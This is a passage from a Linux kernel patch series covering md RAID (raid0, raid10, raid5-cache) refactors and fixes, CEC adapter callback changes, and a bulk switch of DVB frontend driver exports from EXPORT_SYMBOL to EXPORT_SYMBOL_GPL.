+ 					      &mddev->bio_set);
+ 		bio_chain(split, bio);
+-		submit_bio_noacct(bio);
++		raid0_map_submit_bio(mddev, bio);
+ 		bio = split;
+ 	}
+ 
+-	if (bio->bi_pool != &mddev->bio_set)
+-		md_account_bio(mddev, &bio);
+-
+-	orig_sector = sector;
+-	zone = find_zone(mddev->private, &sector);
+-	switch (conf->layout) {
+-	case RAID0_ORIG_LAYOUT:
+-		tmp_dev = map_sector(mddev, zone, orig_sector, &sector);
+-		break;
+-	case RAID0_ALT_MULTIZONE_LAYOUT:
+-		tmp_dev = map_sector(mddev, zone, sector, &sector);
+-		break;
+-	default:
+-		WARN(1, "md/raid0:%s: Invalid layout\n", mdname(mddev));
+-		bio_io_error(bio);
+-		return true;
+-	}
+-
+-	if (unlikely(is_mddev_broken(tmp_dev, "raid0"))) {
+-		bio_io_error(bio);
+-		return true;
+-	}
+-
+-	bio_set_dev(bio, tmp_dev->bdev);
+-	bio->bi_iter.bi_sector = sector + zone->dev_start +
+-		tmp_dev->data_offset;
+-
+-	if (mddev->gendisk)
+-		trace_block_bio_remap(bio, disk_devt(mddev->gendisk),
+-				      bio_sector);
+-	mddev_check_write_zeroes(mddev, bio);
+-	submit_bio_noacct(bio);
++	raid0_map_submit_bio(mddev, bio);
+ 	return true;
+ }
+ 
+@@ -638,6 +639,16 @@ static void raid0_status(struct seq_file *seq, struct mddev *mddev)
+ 	return;
+ }
+ 
++static void raid0_error(struct mddev *mddev, struct md_rdev *rdev)
++{
++	if (!test_and_set_bit(MD_BROKEN, &mddev->flags)) {
++		char *md_name = mdname(mddev);
++
++		pr_crit("md/raid0%s: Disk failure on %pg detected, failing array.\n",
++			md_name, rdev->bdev);
++	}
++}
++
+ static void *raid0_takeover_raid45(struct mddev *mddev)
+ {
+ 	struct md_rdev *rdev;
+@@ -813,6 +824,7 @@ static struct md_personality raid0_personality=
+ 	.size		= raid0_size,
+ 	.takeover	= raid0_takeover,
+ 	.quiesce	= raid0_quiesce,
++	.error_handler	= raid0_error,
+ };
+ 
+ static int __init raid0_init (void)
+diff --git a/drivers/md/raid10.c b/drivers/md/raid10.c
+index d2098fcd6a270..7b318e7e8d459 100644
+--- a/drivers/md/raid10.c
++++ b/drivers/md/raid10.c
+@@ -1317,6 +1317,25 @@ static void raid10_write_one_disk(struct mddev *mddev, struct r10bio *r10_bio,
+ 	}
+ }
+ 
++static struct md_rdev *dereference_rdev_and_rrdev(struct raid10_info *mirror,
++						  struct md_rdev **prrdev)
++{
++	struct md_rdev *rdev, *rrdev;
++
++	rrdev = rcu_dereference(mirror->replacement);
++	/*
++	 * Read replacement first to prevent reading both rdev and
++	 * replacement as NULL during replacement replace rdev.
++	 */
++	smp_mb();
++	rdev = rcu_dereference(mirror->rdev);
++	if (rdev == rrdev)
++		rrdev = NULL;
++
++	*prrdev = rrdev;
++	return rdev;
++}
++
+ static void wait_blocked_dev(struct mddev *mddev, struct r10bio *r10_bio)
+ {
+ 	int i;
+@@ -1327,11 +1346,9 @@ retry_wait:
+ 	blocked_rdev = NULL;
+ 	rcu_read_lock();
+ 	for (i = 0; i < conf->copies; i++) {
+-		struct md_rdev *rdev = rcu_dereference(conf->mirrors[i].rdev);
+-		struct md_rdev *rrdev = rcu_dereference(
+-			conf->mirrors[i].replacement);
+-		if (rdev == rrdev)
+-			rrdev = NULL;
++		struct md_rdev *rdev, *rrdev;
++
++		rdev = dereference_rdev_and_rrdev(&conf->mirrors[i], &rrdev);
+ 		if (rdev && unlikely(test_bit(Blocked, &rdev->flags))) {
+ 			atomic_inc(&rdev->nr_pending);
+ 			blocked_rdev = rdev;
+@@ -1460,15 +1477,7 @@ static void raid10_write_request(struct mddev *mddev, struct bio *bio,
+ 		int d = r10_bio->devs[i].devnum;
+ 		struct md_rdev *rdev, *rrdev;
+ 
+-		rrdev = rcu_dereference(conf->mirrors[d].replacement);
+-		/*
+-		 * Read replacement first to prevent reading both rdev and
+-		 * replacement as NULL during replacement replace rdev.
+-		 */
+-		smp_mb();
+-		rdev = rcu_dereference(conf->mirrors[d].rdev);
+-		if (rdev == rrdev)
+-			rrdev = NULL;
++		rdev = dereference_rdev_and_rrdev(&conf->mirrors[d], &rrdev);
+ 		if (rdev && (test_bit(Faulty, &rdev->flags)))
+ 			rdev = NULL;
+ 		if (rrdev && (test_bit(Faulty, &rrdev->flags)))
+@@ -1775,10 +1784,9 @@ retry_discard:
+ 	 */
+ 	rcu_read_lock();
+ 	for (disk = 0; disk < geo->raid_disks; disk++) {
+-		struct md_rdev *rdev = rcu_dereference(conf->mirrors[disk].rdev);
+-		struct md_rdev *rrdev = rcu_dereference(
+-			conf->mirrors[disk].replacement);
++		struct md_rdev *rdev, *rrdev;
+ 
++		rdev = dereference_rdev_and_rrdev(&conf->mirrors[disk], &rrdev);
+ 		r10_bio->devs[disk].bio = NULL;
+ 		r10_bio->devs[disk].repl_bio = NULL;
+ 
+diff --git a/drivers/md/raid5-cache.c b/drivers/md/raid5-cache.c
+index 832d8566e1656..eb66d0bfe39d2 100644
+--- a/drivers/md/raid5-cache.c
++++ b/drivers/md/raid5-cache.c
+@@ -1260,14 +1260,13 @@ static void r5l_log_flush_endio(struct bio *bio)
+ 
+ 	if (bio->bi_status)
+ 		md_error(log->rdev->mddev, log->rdev);
++	bio_uninit(bio);
+ 
+ 	spin_lock_irqsave(&log->io_list_lock, flags);
+ 	list_for_each_entry(io, &log->flushing_ios, log_sibling)
+ 		r5l_io_run_stripes(io);
+ 	list_splice_tail_init(&log->flushing_ios, &log->finished_ios);
+ 	spin_unlock_irqrestore(&log->io_list_lock, flags);
+-
+-	bio_uninit(bio);
+ }
+ 
+ /*
+@@ -3166,12 +3165,15 @@ void r5l_exit_log(struct r5conf *conf)
+ {
+ 	struct r5l_log *log = conf->log;
+ 
+-	/* Ensure disable_writeback_work wakes up and exits */
+-	wake_up(&conf->mddev->sb_wait);
+-	flush_work(&log->disable_writeback_work);
+ 	md_unregister_thread(&log->reclaim_thread);
+ 
++	/*
++	 * 'reconfig_mutex' is held by caller, set 'conf->log' to NULL to
++	 * ensure disable_writeback_work wakes up and exits.
++	 */
+ 	conf->log = NULL;
++	wake_up(&conf->mddev->sb_wait);
++	flush_work(&log->disable_writeback_work);
+ 
+ 	mempool_exit(&log->meta_pool);
+ 	bioset_exit(&log->bs);
+diff --git a/drivers/media/cec/core/cec-adap.c b/drivers/media/cec/core/cec-adap.c
+index b1512f9c5895c..4bc2a705029e6 100644
+--- a/drivers/media/cec/core/cec-adap.c
++++ b/drivers/media/cec/core/cec-adap.c
+@@ -385,8 +385,8 @@ static void cec_data_cancel(struct cec_data *data, u8 tx_status, u8 rx_status)
+ 	cec_queue_msg_monitor(adap, &data->msg, 1);
+ 
+ 	if (!data->blocking && data->msg.sequence)
+-		/* Allow drivers to process the message first */
+-		call_op(adap, received, &data->msg);
++		/* Allow drivers to react to a canceled transmit */
++		call_void_op(adap, adap_nb_transmit_canceled, &data->msg);
+ 
+ 	cec_data_completed(data);
+ }
+@@ -1345,7 +1345,7 @@ static void cec_adap_unconfigure(struct cec_adapter *adap)
+ 	cec_flush(adap);
+ 	wake_up_interruptible(&adap->kthread_waitq);
+ 	cec_post_state_event(adap);
+-	call_void_op(adap, adap_configured, false);
++	call_void_op(adap, adap_unconfigured);
+ }
+ 
+ /*
+@@ -1536,7 +1536,7 @@ configured:
+ 	adap->kthread_config = NULL;
+ 	complete(&adap->config_completion);
+ 	mutex_unlock(&adap->lock);
+-	call_void_op(adap, adap_configured, true);
++	call_void_op(adap, configured);
+ 	return 0;
+ 
+ unconfigure:
+diff --git a/drivers/media/cec/usb/pulse8/pulse8-cec.c b/drivers/media/cec/usb/pulse8/pulse8-cec.c
+index 04b13cdc38d2c..ba67587bd43ec 100644
+--- a/drivers/media/cec/usb/pulse8/pulse8-cec.c
++++ b/drivers/media/cec/usb/pulse8/pulse8-cec.c
+@@ -809,8 +809,11 @@ static void pulse8_ping_eeprom_work_handler(struct work_struct *work)
+ 
+ 	mutex_lock(&pulse8->lock);
+ 	cmd = MSGCODE_PING;
+-	pulse8_send_and_wait(pulse8, &cmd, 1,
+-			     MSGCODE_COMMAND_ACCEPTED, 0);
++	if (pulse8_send_and_wait(pulse8, &cmd, 1,
++				 MSGCODE_COMMAND_ACCEPTED, 0)) {
++		dev_warn(pulse8->dev, "failed to ping EEPROM\n");
++		goto unlock;
++	}
+ 
+ 	if (pulse8->vers < 2)
+ 		goto unlock;
+diff --git a/drivers/media/dvb-frontends/ascot2e.c b/drivers/media/dvb-frontends/ascot2e.c
+index 9b00b56230b61..cf8e5f1bd1018 100644
+--- a/drivers/media/dvb-frontends/ascot2e.c
++++ b/drivers/media/dvb-frontends/ascot2e.c
+@@ -533,7 +533,7 @@ struct dvb_frontend *ascot2e_attach(struct dvb_frontend *fe,
+ 		priv->i2c_address, priv->i2c);
+ 	return fe;
+ }
+-EXPORT_SYMBOL(ascot2e_attach);
++EXPORT_SYMBOL_GPL(ascot2e_attach);
+ 
+ MODULE_DESCRIPTION("Sony ASCOT2E terr/cab tuner driver");
+ MODULE_AUTHOR("info@netup.ru");
+diff --git a/drivers/media/dvb-frontends/atbm8830.c b/drivers/media/dvb-frontends/atbm8830.c
+index bdd16b9c58244..778c865085bf9 100644
+--- a/drivers/media/dvb-frontends/atbm8830.c
++++ b/drivers/media/dvb-frontends/atbm8830.c
+@@ -489,7 +489,7 @@ error_out:
+ 	return NULL;
+ 
+ }
+-EXPORT_SYMBOL(atbm8830_attach);
++EXPORT_SYMBOL_GPL(atbm8830_attach);
+ 
+ MODULE_DESCRIPTION("AltoBeam ATBM8830/8831 GB20600 demodulator driver");
+ MODULE_AUTHOR("David T. L. Wong <davidtlwong@gmail.com>");
+diff --git a/drivers/media/dvb-frontends/au8522_dig.c b/drivers/media/dvb-frontends/au8522_dig.c
+index 78cafdf279618..230436bf6cbd9 100644
+--- a/drivers/media/dvb-frontends/au8522_dig.c
++++ b/drivers/media/dvb-frontends/au8522_dig.c
+@@ -879,7 +879,7 @@ error:
+ 	au8522_release_state(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(au8522_attach);
++EXPORT_SYMBOL_GPL(au8522_attach);
+ 
+ static const struct dvb_frontend_ops au8522_ops = {
+ 	.delsys = { SYS_ATSC, SYS_DVBC_ANNEX_B },
+diff --git a/drivers/media/dvb-frontends/bcm3510.c b/drivers/media/dvb-frontends/bcm3510.c
+index 68b92b4419cff..b3f5c49accafd 100644
+--- a/drivers/media/dvb-frontends/bcm3510.c
++++ b/drivers/media/dvb-frontends/bcm3510.c
+@@ -835,7 +835,7 @@ error:
+ 	kfree(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(bcm3510_attach);
++EXPORT_SYMBOL_GPL(bcm3510_attach);
+ 
+ static const struct dvb_frontend_ops bcm3510_ops = {
+ 	.delsys = { SYS_ATSC, SYS_DVBC_ANNEX_B },
+diff --git a/drivers/media/dvb-frontends/cx22700.c b/drivers/media/dvb-frontends/cx22700.c
+index b39ff516271b2..1d04c0a652b26 100644
+--- a/drivers/media/dvb-frontends/cx22700.c
++++ b/drivers/media/dvb-frontends/cx22700.c
+@@ -432,4 +432,4 @@ MODULE_DESCRIPTION("Conexant CX22700 DVB-T Demodulator driver");
+ MODULE_AUTHOR("Holger Waechtler");
+ MODULE_LICENSE("GPL");
+ 
+-EXPORT_SYMBOL(cx22700_attach);
++EXPORT_SYMBOL_GPL(cx22700_attach);
+diff --git a/drivers/media/dvb-frontends/cx22702.c b/drivers/media/dvb-frontends/cx22702.c
+index cc6acbf6393d4..61ad34b7004b5 100644
+--- a/drivers/media/dvb-frontends/cx22702.c
++++ b/drivers/media/dvb-frontends/cx22702.c
+@@ -604,7 +604,7 @@ error:
+ 	kfree(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(cx22702_attach);
++EXPORT_SYMBOL_GPL(cx22702_attach);
+ 
+ static const struct dvb_frontend_ops cx22702_ops = {
+ 	.delsys = { SYS_DVBT },
+diff --git a/drivers/media/dvb-frontends/cx24110.c b/drivers/media/dvb-frontends/cx24110.c
+index 6f99d6a27be2d..9aeea089756fe 100644
+--- a/drivers/media/dvb-frontends/cx24110.c
++++ b/drivers/media/dvb-frontends/cx24110.c
+@@ -653,4 +653,4 @@ MODULE_DESCRIPTION("Conexant CX24110 DVB-S Demodulator driver");
+ MODULE_AUTHOR("Peter Hettkamp");
+ MODULE_LICENSE("GPL");
+ 
+-EXPORT_SYMBOL(cx24110_attach);
++EXPORT_SYMBOL_GPL(cx24110_attach);
+diff --git a/drivers/media/dvb-frontends/cx24113.c b/drivers/media/dvb-frontends/cx24113.c
+index dd55d314bf9af..203cb6b3f941b 100644
+--- a/drivers/media/dvb-frontends/cx24113.c
++++ b/drivers/media/dvb-frontends/cx24113.c
+@@ -590,7 +590,7 @@ error:
+ 
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(cx24113_attach);
++EXPORT_SYMBOL_GPL(cx24113_attach);
+ 
+ module_param(debug, int, 0644);
+ MODULE_PARM_DESC(debug, "Activates frontend debugging (default:0)");
+diff --git a/drivers/media/dvb-frontends/cx24116.c b/drivers/media/dvb-frontends/cx24116.c
+index ea8264ccbb4e8..8b978a9f74a4e 100644
+--- a/drivers/media/dvb-frontends/cx24116.c
++++ b/drivers/media/dvb-frontends/cx24116.c
+@@ -1133,7 +1133,7 @@ struct dvb_frontend *cx24116_attach(const struct cx24116_config *config,
+ 	state->frontend.demodulator_priv = state;
+ 	return &state->frontend;
+ }
+-EXPORT_SYMBOL(cx24116_attach);
++EXPORT_SYMBOL_GPL(cx24116_attach);
+ 
+ /*
+  * Initialise or wake up device
+diff --git a/drivers/media/dvb-frontends/cx24120.c b/drivers/media/dvb-frontends/cx24120.c
+index d8acd582c7111..44515fdbe91d4 100644
+--- a/drivers/media/dvb-frontends/cx24120.c
++++ b/drivers/media/dvb-frontends/cx24120.c
+@@ -305,7 +305,7 @@ error:
+ 	kfree(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(cx24120_attach);
++EXPORT_SYMBOL_GPL(cx24120_attach);
+ 
+ static int cx24120_test_rom(struct cx24120_state *state)
+ {
+@@ -973,7 +973,9 @@ static void cx24120_set_clock_ratios(struct dvb_frontend *fe)
+ 	cmd.arg[8] = (clock_ratios_table[idx].rate >> 8) & 0xff;
+ 	cmd.arg[9] = (clock_ratios_table[idx].rate >> 0) & 0xff;
+ 
+-	cx24120_message_send(state, &cmd);
++	ret = cx24120_message_send(state, &cmd);
++	if (ret != 0)
++		return;
+ 
+ 	/* Calculate ber window rates for stat work */
+ 	cx24120_calculate_ber_window(state, clock_ratios_table[idx].rate);
+diff --git a/drivers/media/dvb-frontends/cx24123.c b/drivers/media/dvb-frontends/cx24123.c
+index 3d84ee17e54c6..539889e638ccc 100644
+--- a/drivers/media/dvb-frontends/cx24123.c
++++ b/drivers/media/dvb-frontends/cx24123.c
+@@ -1096,7 +1096,7 @@ error:
+ 
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(cx24123_attach);
++EXPORT_SYMBOL_GPL(cx24123_attach);
+ 
+ static const struct dvb_frontend_ops cx24123_ops = {
+ 	.delsys = { SYS_DVBS },
+diff --git a/drivers/media/dvb-frontends/cxd2820r_core.c b/drivers/media/dvb-frontends/cxd2820r_core.c
+index 5d98222f9df09..8870aeac2872f 100644
+--- a/drivers/media/dvb-frontends/cxd2820r_core.c
++++ b/drivers/media/dvb-frontends/cxd2820r_core.c
+@@ -536,7 +536,7 @@ struct dvb_frontend *cxd2820r_attach(const struct cxd2820r_config *config,
+ 
+ 	return pdata.get_dvb_frontend(client);
+ }
+-EXPORT_SYMBOL(cxd2820r_attach);
++EXPORT_SYMBOL_GPL(cxd2820r_attach);
+ 
+ static struct dvb_frontend *cxd2820r_get_dvb_frontend(struct i2c_client *client)
+ {
+diff --git a/drivers/media/dvb-frontends/cxd2841er.c b/drivers/media/dvb-frontends/cxd2841er.c
+index 5431f922f55e4..e9d1eef40c627 100644
+--- a/drivers/media/dvb-frontends/cxd2841er.c
++++ b/drivers/media/dvb-frontends/cxd2841er.c
+@@ -3930,14 +3930,14 @@ struct dvb_frontend *cxd2841er_attach_s(struct cxd2841er_config *cfg,
+ {
+ 	return cxd2841er_attach(cfg, i2c, SYS_DVBS);
+ }
+-EXPORT_SYMBOL(cxd2841er_attach_s);
++EXPORT_SYMBOL_GPL(cxd2841er_attach_s);
+ 
+ struct dvb_frontend *cxd2841er_attach_t_c(struct cxd2841er_config *cfg,
+ 					struct i2c_adapter *i2c)
+ {
+ 	return cxd2841er_attach(cfg, i2c, 0);
+ }
+-EXPORT_SYMBOL(cxd2841er_attach_t_c);
++EXPORT_SYMBOL_GPL(cxd2841er_attach_t_c);
+ 
+ static const struct dvb_frontend_ops cxd2841er_dvbs_s2_ops = {
+ 	.delsys = { SYS_DVBS, SYS_DVBS2 },
+diff --git a/drivers/media/dvb-frontends/cxd2880/cxd2880_top.c b/drivers/media/dvb-frontends/cxd2880/cxd2880_top.c
+index d5b1b3788e392..09d31c368741d 100644
+--- a/drivers/media/dvb-frontends/cxd2880/cxd2880_top.c
++++ b/drivers/media/dvb-frontends/cxd2880/cxd2880_top.c
+@@ -1950,7 +1950,7 @@ struct dvb_frontend *cxd2880_attach(struct dvb_frontend *fe,
+ 
+ 	return fe;
+ }
+-EXPORT_SYMBOL(cxd2880_attach);
++EXPORT_SYMBOL_GPL(cxd2880_attach);
+ 
+ MODULE_DESCRIPTION("Sony CXD2880 DVB-T2/T tuner + demod driver");
+ MODULE_AUTHOR("Sony Semiconductor Solutions Corporation");
+diff --git a/drivers/media/dvb-frontends/dib0070.c b/drivers/media/dvb-frontends/dib0070.c
+index cafb41dba861c..9a8e7cdd2a247 100644
+--- a/drivers/media/dvb-frontends/dib0070.c
++++ b/drivers/media/dvb-frontends/dib0070.c
+@@ -762,7 +762,7 @@ free_mem:
+ 	fe->tuner_priv = NULL;
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(dib0070_attach);
++EXPORT_SYMBOL_GPL(dib0070_attach);
+ 
+ MODULE_AUTHOR("Patrick Boettcher <patrick.boettcher@posteo.de>");
+ MODULE_DESCRIPTION("Driver for the DiBcom 0070 base-band RF Tuner");
+diff --git a/drivers/media/dvb-frontends/dib0090.c b/drivers/media/dvb-frontends/dib0090.c
+index 903da33642dff..c958bcff026ec 100644
+--- a/drivers/media/dvb-frontends/dib0090.c
++++ b/drivers/media/dvb-frontends/dib0090.c
+@@ -2634,7 +2634,7 @@ struct dvb_frontend *dib0090_register(struct dvb_frontend *fe, struct i2c_adapte
+ 	return NULL;
+ }
+ 
+-EXPORT_SYMBOL(dib0090_register);
++EXPORT_SYMBOL_GPL(dib0090_register);
+ 
+ struct dvb_frontend *dib0090_fw_register(struct dvb_frontend *fe, struct i2c_adapter *i2c, const struct dib0090_config *config)
+ {
+@@ -2660,7 +2660,7 @@ free_mem:
+ 	fe->tuner_priv = NULL;
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(dib0090_fw_register);
++EXPORT_SYMBOL_GPL(dib0090_fw_register);
+ 
+ MODULE_AUTHOR("Patrick Boettcher <patrick.boettcher@posteo.de>");
+ MODULE_AUTHOR("Olivier Grenie <olivier.grenie@parrot.com>");
+diff --git a/drivers/media/dvb-frontends/dib3000mb.c b/drivers/media/dvb-frontends/dib3000mb.c
+index a6c2fc4586eb3..c598b2a633256 100644
+--- a/drivers/media/dvb-frontends/dib3000mb.c
++++ b/drivers/media/dvb-frontends/dib3000mb.c
+@@ -815,4 +815,4 @@ MODULE_AUTHOR(DRIVER_AUTHOR);
+ MODULE_DESCRIPTION(DRIVER_DESC);
+ MODULE_LICENSE("GPL");
+ 
+-EXPORT_SYMBOL(dib3000mb_attach);
++EXPORT_SYMBOL_GPL(dib3000mb_attach);
+diff --git a/drivers/media/dvb-frontends/dib3000mc.c b/drivers/media/dvb-frontends/dib3000mc.c
+index 2e11a246aae0d..c2fca8289abae 100644
+--- a/drivers/media/dvb-frontends/dib3000mc.c
++++ b/drivers/media/dvb-frontends/dib3000mc.c
+@@ -935,7 +935,7 @@ error:
+ 	kfree(st);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(dib3000mc_attach);
++EXPORT_SYMBOL_GPL(dib3000mc_attach);
+ 
+ static const struct dvb_frontend_ops dib3000mc_ops = {
+ 	.delsys = { SYS_DVBT },
+diff --git a/drivers/media/dvb-frontends/dib7000m.c b/drivers/media/dvb-frontends/dib7000m.c
+index 97ce97789c9e3..fdb22f32e3a11 100644
+--- a/drivers/media/dvb-frontends/dib7000m.c
++++ b/drivers/media/dvb-frontends/dib7000m.c
+@@ -1434,7 +1434,7 @@ error:
+ 	kfree(st);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(dib7000m_attach);
++EXPORT_SYMBOL_GPL(dib7000m_attach);
+ 
+ static const struct dvb_frontend_ops dib7000m_ops = {
+ 	.delsys = { SYS_DVBT },
+diff --git a/drivers/media/dvb-frontends/dib7000p.c b/drivers/media/dvb-frontends/dib7000p.c
+index a90d2f51868ff..d1e53de5206ae 100644
+--- a/drivers/media/dvb-frontends/dib7000p.c
++++ b/drivers/media/dvb-frontends/dib7000p.c
+@@ -497,7 +497,7 @@ static int dib7000p_update_pll(struct dvb_frontend *fe, struct dibx000_bandwidth
+ 	prediv = reg_1856 & 0x3f;
+ 	loopdiv = (reg_1856 >> 6) & 0x3f;
+ 
+-	if ((bw != NULL) && (bw->pll_prediv != prediv || bw->pll_ratio != loopdiv)) {
++	if (loopdiv && bw && (bw->pll_prediv != prediv || bw->pll_ratio != loopdiv)) {
+ 		dprintk("Updating pll (prediv: old =  %d new = %d ; loopdiv : old = %d new = %d)\n", prediv, bw->pll_prediv, loopdiv, bw->pll_ratio);
+ 		reg_1856 &= 0xf000;
+ 		reg_1857 = dib7000p_read_word(state, 1857);
+@@ -2822,7 +2822,7 @@ void *dib7000p_attach(struct dib7000p_ops *ops)
+ 
+ 	return ops;
+ }
+-EXPORT_SYMBOL(dib7000p_attach);
++EXPORT_SYMBOL_GPL(dib7000p_attach);
+ 
+ static const struct dvb_frontend_ops dib7000p_ops = {
+ 	.delsys = { SYS_DVBT },
+diff --git a/drivers/media/dvb-frontends/dib8000.c b/drivers/media/dvb-frontends/dib8000.c
+index fe19d127abb3f..301d8eca7a6f9 100644
+--- a/drivers/media/dvb-frontends/dib8000.c
++++ b/drivers/media/dvb-frontends/dib8000.c
+@@ -4527,7 +4527,7 @@ void *dib8000_attach(struct dib8000_ops *ops)
+ 
+ 	return ops;
+ }
+-EXPORT_SYMBOL(dib8000_attach);
++EXPORT_SYMBOL_GPL(dib8000_attach);
+ 
+ MODULE_AUTHOR("Olivier Grenie <Olivier.Grenie@parrot.com, Patrick Boettcher <patrick.boettcher@posteo.de>");
+ MODULE_DESCRIPTION("Driver for the DiBcom 8000 ISDB-T demodulator");
+diff --git a/drivers/media/dvb-frontends/dib9000.c b/drivers/media/dvb-frontends/dib9000.c
+index 914ca820c174b..6f81890b31eeb 100644
+--- a/drivers/media/dvb-frontends/dib9000.c
++++ b/drivers/media/dvb-frontends/dib9000.c
+@@ -2546,7 +2546,7 @@ error:
+ 	kfree(st);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(dib9000_attach);
++EXPORT_SYMBOL_GPL(dib9000_attach);
+ 
+ static const struct dvb_frontend_ops dib9000_ops = {
+ 	.delsys = { SYS_DVBT },
+diff --git a/drivers/media/dvb-frontends/drx39xyj/drxj.c b/drivers/media/dvb-frontends/drx39xyj/drxj.c
+index bf9e4ef35684b..88860d08f9c12 100644
+--- a/drivers/media/dvb-frontends/drx39xyj/drxj.c
++++ b/drivers/media/dvb-frontends/drx39xyj/drxj.c
+@@ -12368,7 +12368,7 @@ error:
+ 
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(drx39xxj_attach);
++EXPORT_SYMBOL_GPL(drx39xxj_attach);
+ 
+ static const struct dvb_frontend_ops drx39xxj_ops = {
+ 	.delsys = { SYS_ATSC, SYS_DVBC_ANNEX_B },
+diff --git a/drivers/media/dvb-frontends/drxd_hard.c b/drivers/media/dvb-frontends/drxd_hard.c
+index 9860cae65f1cf..6a531937f4bbb 100644
+--- a/drivers/media/dvb-frontends/drxd_hard.c
++++ b/drivers/media/dvb-frontends/drxd_hard.c
+@@ -2939,7 +2939,7 @@ error:
+ 	kfree(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(drxd_attach);
++EXPORT_SYMBOL_GPL(drxd_attach);
+ 
+ MODULE_DESCRIPTION("DRXD driver");
+ MODULE_AUTHOR("Micronas");
+diff --git a/drivers/media/dvb-frontends/drxk_hard.c b/drivers/media/dvb-frontends/drxk_hard.c
+index 9807f54119965..ff864c9bb7743 100644
+--- a/drivers/media/dvb-frontends/drxk_hard.c
++++ b/drivers/media/dvb-frontends/drxk_hard.c
+@@ -6833,7 +6833,7 @@ error:
+ 	kfree(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(drxk_attach);
++EXPORT_SYMBOL_GPL(drxk_attach);
+ 
+ MODULE_DESCRIPTION("DRX-K driver");
+ MODULE_AUTHOR("Ralph Metzler");
+diff --git a/drivers/media/dvb-frontends/ds3000.c b/drivers/media/dvb-frontends/ds3000.c
+index 20fcf31af1658..515aa7c7baf2a 100644
+--- a/drivers/media/dvb-frontends/ds3000.c
++++ b/drivers/media/dvb-frontends/ds3000.c
+@@ -859,7 +859,7 @@ struct dvb_frontend *ds3000_attach(const struct ds3000_config *config,
+ 	ds3000_set_voltage(&state->frontend, SEC_VOLTAGE_OFF);
+ 	return &state->frontend;
+ }
+-EXPORT_SYMBOL(ds3000_attach);
++EXPORT_SYMBOL_GPL(ds3000_attach);
+ 
+ static int ds3000_set_carrier_offset(struct dvb_frontend *fe,
+ 					s32 carrier_offset_khz)
+diff --git a/drivers/media/dvb-frontends/dvb-pll.c b/drivers/media/dvb-frontends/dvb-pll.c
+index baf2a378e565f..fcf322ff82356 100644
+--- a/drivers/media/dvb-frontends/dvb-pll.c
++++ b/drivers/media/dvb-frontends/dvb-pll.c
+@@ -866,7 +866,7 @@ out:
+ 
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(dvb_pll_attach);
++EXPORT_SYMBOL_GPL(dvb_pll_attach);
+ 
+ 
+ static int
+diff --git a/drivers/media/dvb-frontends/ec100.c b/drivers/media/dvb-frontends/ec100.c
+index 03bd80666cf83..2ad0a3c2f7567 100644
+--- a/drivers/media/dvb-frontends/ec100.c
++++ b/drivers/media/dvb-frontends/ec100.c
+@@ -299,7 +299,7 @@ error:
+ 	kfree(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(ec100_attach);
++EXPORT_SYMBOL_GPL(ec100_attach);
+ 
+ static const struct dvb_frontend_ops ec100_ops = {
+ 	.delsys = { SYS_DVBT },
+diff --git a/drivers/media/dvb-frontends/helene.c b/drivers/media/dvb-frontends/helene.c
+index 8c1310c6b0bc2..c299d31dc7d27 100644
+--- a/drivers/media/dvb-frontends/helene.c
++++ b/drivers/media/dvb-frontends/helene.c
+@@ -1025,7 +1025,7 @@ struct dvb_frontend *helene_attach_s(struct dvb_frontend *fe,
+ 			priv->i2c_address, priv->i2c);
+ 	return fe;
+ }
+-EXPORT_SYMBOL(helene_attach_s);
++EXPORT_SYMBOL_GPL(helene_attach_s);
+ 
+ struct dvb_frontend *helene_attach(struct dvb_frontend *fe,
+ 		const struct helene_config *config,
+@@ -1061,7 +1061,7 @@ struct dvb_frontend *helene_attach(struct dvb_frontend *fe,
+ 			priv->i2c_address, priv->i2c);
+ 	return fe;
+ }
+-EXPORT_SYMBOL(helene_attach);
++EXPORT_SYMBOL_GPL(helene_attach);
+ 
+ static int helene_probe(struct i2c_client *client,
+ 			const struct i2c_device_id *id)
+diff --git a/drivers/media/dvb-frontends/horus3a.c b/drivers/media/dvb-frontends/horus3a.c
+index 24bf5cbcc1846..0330b78a5b3f2 100644
+--- a/drivers/media/dvb-frontends/horus3a.c
++++ b/drivers/media/dvb-frontends/horus3a.c
+@@ -395,7 +395,7 @@ struct dvb_frontend *horus3a_attach(struct dvb_frontend *fe,
+ 		priv->i2c_address, priv->i2c);
+ 	return fe;
+ }
+-EXPORT_SYMBOL(horus3a_attach);
++EXPORT_SYMBOL_GPL(horus3a_attach);
+ 
+ MODULE_DESCRIPTION("Sony HORUS3A satellite tuner driver");
+ MODULE_AUTHOR("Sergey Kozlov <serjk@netup.ru>");
+diff --git a/drivers/media/dvb-frontends/isl6405.c b/drivers/media/dvb-frontends/isl6405.c
+index 2cd69b4ff82cb..7d28a743f97eb 100644
+--- a/drivers/media/dvb-frontends/isl6405.c
++++ b/drivers/media/dvb-frontends/isl6405.c
+@@ -141,7 +141,7 @@ struct dvb_frontend *isl6405_attach(struct dvb_frontend *fe, struct i2c_adapter
+ 
+ 	return fe;
+ }
+-EXPORT_SYMBOL(isl6405_attach);
++EXPORT_SYMBOL_GPL(isl6405_attach);
+ 
+ MODULE_DESCRIPTION("Driver for lnb supply and control ic isl6405");
+ MODULE_AUTHOR("Hartmut Hackmann & Oliver Endriss");
+diff --git a/drivers/media/dvb-frontends/isl6421.c b/drivers/media/dvb-frontends/isl6421.c
+index 43b0dfc6f453e..2e9f6f12f849e 100644
+--- a/drivers/media/dvb-frontends/isl6421.c
++++ b/drivers/media/dvb-frontends/isl6421.c
+@@ -213,7 +213,7 @@ struct dvb_frontend *isl6421_attach(struct dvb_frontend *fe, struct i2c_adapter
+ 
+ 	return fe;
+ }
+-EXPORT_SYMBOL(isl6421_attach);
++EXPORT_SYMBOL_GPL(isl6421_attach);
+ 
